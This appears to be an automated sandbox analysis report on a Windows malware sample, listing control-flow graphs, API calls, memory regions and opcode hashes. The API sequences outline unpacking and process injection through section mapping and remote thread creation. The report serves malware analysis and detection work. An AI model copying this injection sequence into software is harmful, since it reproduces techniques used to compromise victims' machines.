                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 399 402f97-402fbb 400 402fc1-402fd9 399->400 401 4030ee-4030f3 399->401 400->401 402 402fdf-402ff0 400->402 403 402ff2-402ffb 402->403 404 403000-40300e 403->404 404->404 405 403010-403017 404->405 406 403039-403040 405->406 407 403019-403038 405->407 408 403062-403065 406->408 409 403042-403061 406->409 407->406 410 403067-40306a 408->410 411 40306e 408->411 409->408 410->411 412 40306c 410->412 411->403 413 403070-403075 411->413 412->413 413->401 414 403077-40307a 413->414 414->401 415 40307c-4030eb RtlCreateUserThread NtTerminateProcess 414->415 415->401
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: CreateProcessTerminateThreadUser
                                        • String ID:
                                        • API String ID: 1921587553-0
                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 68 2c8003c-2c80047 69 2c80049 68->69 70 2c8004c-2c80263 call 2c80a3f call 2c80e0f call 2c80d90 VirtualAlloc 68->70 69->70 85 2c8028b-2c80292 70->85 86 2c80265-2c80289 call 2c80a69 70->86 88 2c802a1-2c802b0 85->88 90 2c802ce-2c803c2 VirtualProtect call 2c80cce call 2c80ce7 86->90 88->90 91 2c802b2-2c802cc 88->91 97 2c803d1-2c803e0 90->97 91->88 98 2c80439-2c804b8 VirtualFree 97->98 99 2c803e2-2c80437 call 2c80ce7 97->99 100 2c804be-2c804cd 98->100 101 2c805f4-2c805fe 98->101 99->97 103 2c804d3-2c804dd 100->103 104 2c8077f-2c80789 101->104 105 2c80604-2c8060d 101->105 103->101 108 2c804e3-2c80505 103->108 109 2c8078b-2c807a3 104->109 110 2c807a6-2c807b0 104->110 105->104 111 2c80613-2c80637 105->111 119 2c80517-2c80520 108->119 120 2c80507-2c80515 108->120 109->110 112 2c8086e-2c808be LoadLibraryA 110->112 113 2c807b6-2c807cb 110->113 114 2c8063e-2c80648 111->114 118 2c808c7-2c808f9 112->118 116 2c807d2-2c807d5 113->116 114->104 117 2c8064e-2c8065a 114->117 121 2c80824-2c80833 116->121 122 2c807d7-2c807e0 116->122 117->104 123 2c80660-2c8066a 117->123 124 2c808fb-2c80901 118->124 125 2c80902-2c8091d 118->125 126 2c80526-2c80547 119->126 120->126 130 2c80839-2c8083c 121->130 127 2c807e2 122->127 128 2c807e4-2c80822 122->128 129 2c8067a-2c80689 123->129 124->125 131 2c8054d-2c80550 126->131 127->121 128->116 132 2c8068f-2c806b2 129->132 133 2c80750-2c8077a 129->133 130->112 134 2c8083e-2c80847 130->134 136 2c805e0-2c805ef 131->136 137 2c80556-2c8056b 131->137 138 2c806ef-2c806fc 132->138 139 2c806b4-2c806ed 132->139 133->114 140 2c80849 134->140 141 2c8084b-2c8086c 134->141 136->103 144 2c8056d 137->144 145 2c8056f-2c8057a 137->145 142 2c8074b 138->142 143 2c806fe-2c80748 138->143 139->138 140->112 141->130 142->129 143->142 144->136 148 2c8059b-2c805bb 145->148 149 2c8057c-2c80599 145->149 152 2c805bd-2c805db 148->152 149->152 152->131
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C8024D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_wafguag.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID: cess$kernel32.dll
                                        • API String ID: 4275171209-1230238691
                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction ID: acd8429db98b17632d335476261fc33c41f825b06f7640636538905718581767
                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction Fuzzy Hash: 62526B75A01229DFDB64CF58C984BACBBB1BF09308F1480D9E54DAB351DB30AA89DF15

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 370 415867-41586e 371 415870-415880 370->371 372 415882 371->372 373 415888-41588b 371->373 372->373 373->371 374 41588d-4158ae LoadLibraryA call 4151b0 call 4154a0 373->374 379 4158b0-4158b7 374->379 380 4158c3-4158c9 379->380 381 4158b9-4158bf 379->381 382 4158d0-4158d7 380->382 383 4158cb call 4151a0 380->383 381->380 385 4158e6-4158ed 382->385 386 4158d9-4158e0 InterlockedDecrement 382->386 383->382 385->379 388 4158ef-4158ff 385->388 386->385 389 415900-415910 388->389 390 415912 389->390 391 415919-41591c 389->391 390->391 391->389 392 41591e-415929 391->392 393 415930-415935 392->393 394 415937-41593d 393->394 395 41593f-415945 393->395 394->395 396 415947-415954 394->396 395->393 395->396
                                        APIs
                                        • LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
                                        • InterlockedDecrement.KERNEL32(?), ref: 004158E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd
                                        Similarity
                                        • API ID: DecrementInterlockedLibraryLoad
                                        • String ID: k`$}$
                                        • API String ID: 1728580480-956986773
                                        • Opcode ID: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
                                        • Instruction ID: 273e988762e02699ff252dc655ae774bf30313f900aa46e77cba19cfb1f4ca4e
                                        • Opcode Fuzzy Hash: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
                                        • Instruction Fuzzy Hash: 71113670D41A10CBDB20EB6099857DABB64FBC8365F92043BD94997251CA3C88E18B99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 4151b0-4152f0 GetModuleHandleW GetProcAddress VirtualProtect
                                        APIs
                                        • GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041528F
                                        • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004152CC
                                        • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004152EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-3916222277
                                        • Opcode ID: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
                                        • Instruction ID: 6a590a8926acfa3c7df48d762a2d30e232421f7677ab7ce89d68225f10d6884e
                                        • Opcode Fuzzy Hash: 05a0996e96e2e6dea05aedbe29179f43af643523e767b93736c198f8bfabdd5c
                                        • Instruction Fuzzy Hash: DE311C20A5B680CBF301CB78F8047923E62BB25744F44847895498B3A5EBBA5534E7EF

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 416 2dff805-2dff81e 417 2dff820-2dff822 416->417 418 2dff829-2dff835 CreateToolhelp32Snapshot 417->418 419 2dff824 417->419 420 2dff837-2dff83d 418->420 421 2dff845-2dff852 Module32First 418->421 419->418 420->421 426 2dff83f-2dff843 420->426 422 2dff85b-2dff863 421->422 423 2dff854-2dff855 call 2dff4c4 421->423 427 2dff85a 423->427 426->417 426->421 427->422
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DFF82D
                                        • Module32First.KERNEL32(00000000,00000224), ref: 02DFF84D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DFC000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2dfc000_wafguag.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3833638111-0
                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction ID: 3e06f5777bcf43999863293470825928c612fae344323b3847b200e3b693b6b5
                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction Fuzzy Hash: 0DF0F631100311AFD7603BF4988CB6E72ECEF48724F21052CE74291AC0CB70EC058A64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 429 2c80e0f-2c80e24 SetErrorMode * 2 430 2c80e2b-2c80e2c 429->430 431 2c80e26 429->431 431->430
                                        APIs
                                        • SetErrorMode.KERNELBASE(00000400,?,?,02C80223,?,?), ref: 02C80E19
                                        • SetErrorMode.KERNELBASE(00000000,?,?,02C80223,?,?), ref: 02C80E1E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_wafguag.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction ID: ac362fad639c5c9b64cd8f07aeb9a6a6ad7bb22d7ae53432970dca695a8b64fe
                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction Fuzzy Hash: 8ED0123214512877D7003A94DC09BCE7B1CDF05B66F008011FB0DD9080C770964046E5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 432 4018e6-40194b call 401193 Sleep call 40141f 446 40195a-4019a5 call 401193 432->446 447 40194d-401955 call 401514 432->447 447->446
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 461 401915-401918 462 4018c6-4018c7 461->462 463 40191a-40194b call 401193 Sleep call 40141f 461->463 464 4018d7 462->464 465 4018ce-4018e3 call 401193 462->465 475 40195a-4019a5 call 401193 463->475 476 40194d-401955 call 401514 463->476 464->465 476->475
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 490 4018f1-40194b call 401193 Sleep call 40141f 500 40195a-4019a5 call 401193 490->500 501 40194d-401955 call 401514 490->501 501->500
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DFF515
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DFC000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2dfc000_wafguag.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction ID: ae8943e9392b5b2e70627194635452ba8774c90383d3fb8a07b39724936d13cf
                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction Fuzzy Hash: 67112A79A00208EFDB01DF98C985E99BBF5AF08350F068094FA489B361D371EA50DF94
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_wafguag.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                        APIs
                                        • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415848), ref: 00415188
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd
                                        Similarity
                                        • API ID: AllocLocal
                                        • String ID:
                                        • API String ID: 3494564517-0
                                        • Opcode ID: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
                                        • Instruction ID: f865e6b2e3803cbb86dad00ce2678956489d20d1f66e016f0fea3cba8c339ba6
                                        • Opcode Fuzzy Hash: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
                                        • Instruction Fuzzy Hash: 79B092B09822009BE2408FB0A844B513A65B308342F414821F60886280CA2164208F14
                                        APIs
                                        • BuildCommDCBA.KERNEL32(00000000,?), ref: 004153B1
                                        • WritePrivateProfileStringA.KERNEL32(00417378,00417354,0041732C,0041731C), ref: 004153D5
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004153DD
                                        • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041541D
                                        • GetComputerNameW.KERNEL32(?,?), ref: 00415431
                                        • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041543F
                                        • OpenJobObjectA.KERNEL32(00000000,00000000,004173A0), ref: 0041544E
                                        • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041545F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd
                                        Similarity
                                        • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                        • String ID: -
                                        • API String ID: 113859268-2547889144
                                        • Opcode ID: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
                                        • Instruction ID: 204a2022625e4fb3e4702eb5f8edaa10a17d11f6e745e2405329eac1171ae186
                                        • Opcode Fuzzy Hash: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
                                        • Instruction Fuzzy Hash: 95210831A44348EBE720DFA4DC85BD97B70EB4C752F1180AAFA49AA1C0CAF459C4CF59
                                        APIs
                                        • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004154D4
                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004154EF
                                        • HeapDestroy.KERNEL32(00000000), ref: 0041550E
                                        • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415516
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd
                                        Similarity
                                        • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                        • String ID:
                                        • API String ID: 367530164-0
                                        • Opcode ID: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
                                        • Instruction ID: fa24f5b182106e8a66cc9c052caed5fc4614bc77b159341e0b6937d28379f147
                                        • Opcode Fuzzy Hash: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
                                        • Instruction Fuzzy Hash: 4B01A770A41508EBE750EBB4ED45BDA7BB8B70C346F404037EA0597281DA745D90CB59